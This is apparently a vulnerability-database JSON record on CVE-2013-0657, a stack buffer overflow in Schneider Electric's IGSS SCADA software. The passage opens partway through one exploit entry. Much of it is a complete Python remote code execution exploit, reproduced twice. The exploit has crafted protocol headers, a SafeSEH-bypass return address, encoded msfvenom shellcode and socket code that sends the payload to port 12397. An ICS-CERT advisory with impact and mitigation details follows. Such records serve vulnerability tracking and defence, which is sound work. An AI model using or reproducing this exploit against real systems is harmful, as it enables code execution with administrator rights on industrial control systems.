\"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\"\nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\"\nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\"\nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\"\nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\"\nshellcode += \"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\"\nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\"\nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\"\nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\"\nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\"\nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\"\nshellcode += \"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\"\n\nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK\n\npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK\nprint \"Payload length: \"+str(len(payload))\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(con)\ns.send(payload)\ns.recv(10)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-08-21T00:27:48", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2018-08-20T00:00:00", "title": "SEIG SCADA System 9 - Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "modified": "2018-08-20T00:00:00", "id": "1337DAY-ID-30925", "href": "https://0day.today/exploit/description/30925", "sourceData": "# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution\r\n# Author: Alejandro Parodi\r\n# Vendor Homepage: https://www.schneider-electric.com\r\n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/\r\n# Version: v9\r\n# Tested on: Windows7 x86\r\n# CVE: CVE-2013-0657\r\n# References: \r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657\r\n \r\nimport socket\r\nimport struct\r\n \r\nip = \"192.168.0.23\"\r\nport = 12397\r\ncon = (ip, port)\r\n \r\n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)\r\n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644\r\n# payload = length+message\r\n \r\n# Exploit Magic\r\nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\"\r\nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 0x6000)\r\npadding = \"B\" * 3344\r\neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)\r\n \r\n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python\r\n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources\r\nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass\r\nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\nshellcode += \"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\"\r\nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\"\r\nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\"\r\nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\"\r\nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\"\r\nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\"\r\nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\"\r\nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\"\r\nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\"\r\nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\"\r\nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\"\r\nshellcode += \"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\"\r\nshellcode += \"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\"\r\nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\"\r\nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\"\r\nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\"\r\nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\"\r\nshellcode += \"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\"\r\nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\"\r\nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\"\r\nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\"\r\nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\"\r\nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\"\r\nshellcode += \"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\"\r\n \r\nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK\r\n \r\npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK\r\nprint \"Payload length: \"+str(len(payload))\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(con)\r\ns.send(payload)\r\ns.recv(10)\n\n# 0day.today [2018-08-20] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30925"}], "ics": [{"lastseen": "2020-12-18T03:22:41", "bulletinFamily": "info", "cvelist": ["CVE-2013-0657"], "description": "## Overview\n\nIndependent researcher Aaron Portnoy of Exodus Intelligence has identified a buffer overflow vulnerability in Schneider Electric\u2019s Interactive Graphical SCADA System (IGSS) application. Schneider Electric has produced a patch that fully resolves this vulnerability. Aaron Portnoy has validated this patch. This vulnerability could be exploited remotely.\n\n## Affected Products\n\nThe Schneider Electric products affected:\n\n * IGSS application, all versions.\n\n## Impact\n\nAn exploit of this vulnerability could result in a buffer overflow that could possibly allow an attacker to execute code under administrator credentials. IGSS is employed in many sectors including renewable energy, process control, monitoring and control, motor controls, lighting controls, electrical distribution, and security systems.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## Background\n\nSchneider Electric is a US-based company that maintains offices in 190 countries worldwide. Their products address various markets including renewable energy, process control, monitoring and control, motor controls, lighting controls, electrical distribution, and security systems.\n\nIGSS is a desktop application that is used to integrate industrial control system (ICS) components from diverse vendors using diverse sets of protocols and integrate their configuration and monitoring functions using IGSS as a single supervisory or human-machine interface (HMI) system. This software is employed worldwide in a broad range of application areas outside those market areas listed above.\n\n## Vulnerability Characterization\n\n### Vulnerability Overview\n\nVulnerability classifications are classified by [Common Weakness Enumerations (CWE)](<http://cwe.mitre.org/data/>). This stack-based buffer overflow is classified as CWE-121.\n\n#### Stack-Based Buffer Overflow1\n\nIGSS communicates with a broad range of ICS devices using a broad range of protocols over two network ports, Ports (12397 and 12399)/TCP by default. This exploit has found that out-ofprotocol communication over Port 12397/TCP can cause a buffer overflow condition. Although this overflow can cause the application to crash, an attacker can also apply techniques to take advantage of the buffer overflow and likely execute malicious code with administrator privileges.\n\n[CVE-2013-0657](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0657>) has been assigned to this vulnerability. A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string is [(AV:N/AC:L/Au:N/C:C/I:C/A:C)](<http://nvd.nist.gov/cvss.cfm?name=&vector=%28AV:N/AC:L/Au:N/C:C/I:C/A:C%29&version=2>).\n\n### Vulnerability Details\n\n#### Exploitability\n\nThis vulnerability can be exploited remotely.\n\n#### Existence of Exploit\n\nNo known public exploits specifically target this vulnerability.\n\n#### Difficulty\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## Mitigation\n\nThe best mitigation for this vulnerability is applying the appropriate vendor-supplied patch listed in the footnotes below. \nSchneider Electric has issued two patches for versions [V9 ](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>)and [V10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>)\n\nIf this vulnerability is not mitigated, a remote attacker could cause a buffer overflow and allow malicious code to be executed with administrator privileges. of the IGSS software to address this vulnerability. These patches are available from the Schneider Electric Web site or directly from the links in this advisory. Aaron Portnoy of Exodus Intelligence has validated the patches.\n\nUsers of this software with older versions should upgrade their software or employ other mitigation methods. At a minimum, this port should be filtered to only allow access from the specific IP addresses for the devices being controlled or monitored. General measures listed below can also be employed to help mitigate this vulnerability.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices. Critical devices should not directly face the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN is only as secure as the connected devices.\n\nICS-CERT provides a section for control systems security recommended practices on the US-CERT Web page. Several recommended practices are available for reading and download, including _Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies_.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01A\u2014Cyber Intrusion Mitigation Strategies, ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nPrevious Recommendations can be used as needed (otherwise, delete this text). List other products that are specific to the topic (i.e., phishing mitigations):\n\nIn addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:\n\n 1. Do not click Web links or open unsolicited attachments in email messages.\n 2. Refer to _Recognizing and Avoiding Email Scams_ for more information on avoiding email scams.\n 3. Refer to _Avoiding Social Engineering and Phishing Attacks_ for more information on social engineering attacks.\n * 1. CWE-121, http://cwe.mitre.org/data/definitions/121.html, CWE-121: Stack-based Buffer Overflow, Web site last accessed January 18, 2013.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-13-018-01>); we'd welcome your feedback.\n", "edition": 15, "modified": "2013-05-06T00:00:00", "published": "2013-01-17T00:00:00", "id": "ICSA-13-018-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-13-018-01", "title": "Schneider Electric IGSS Buffer Overflow", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}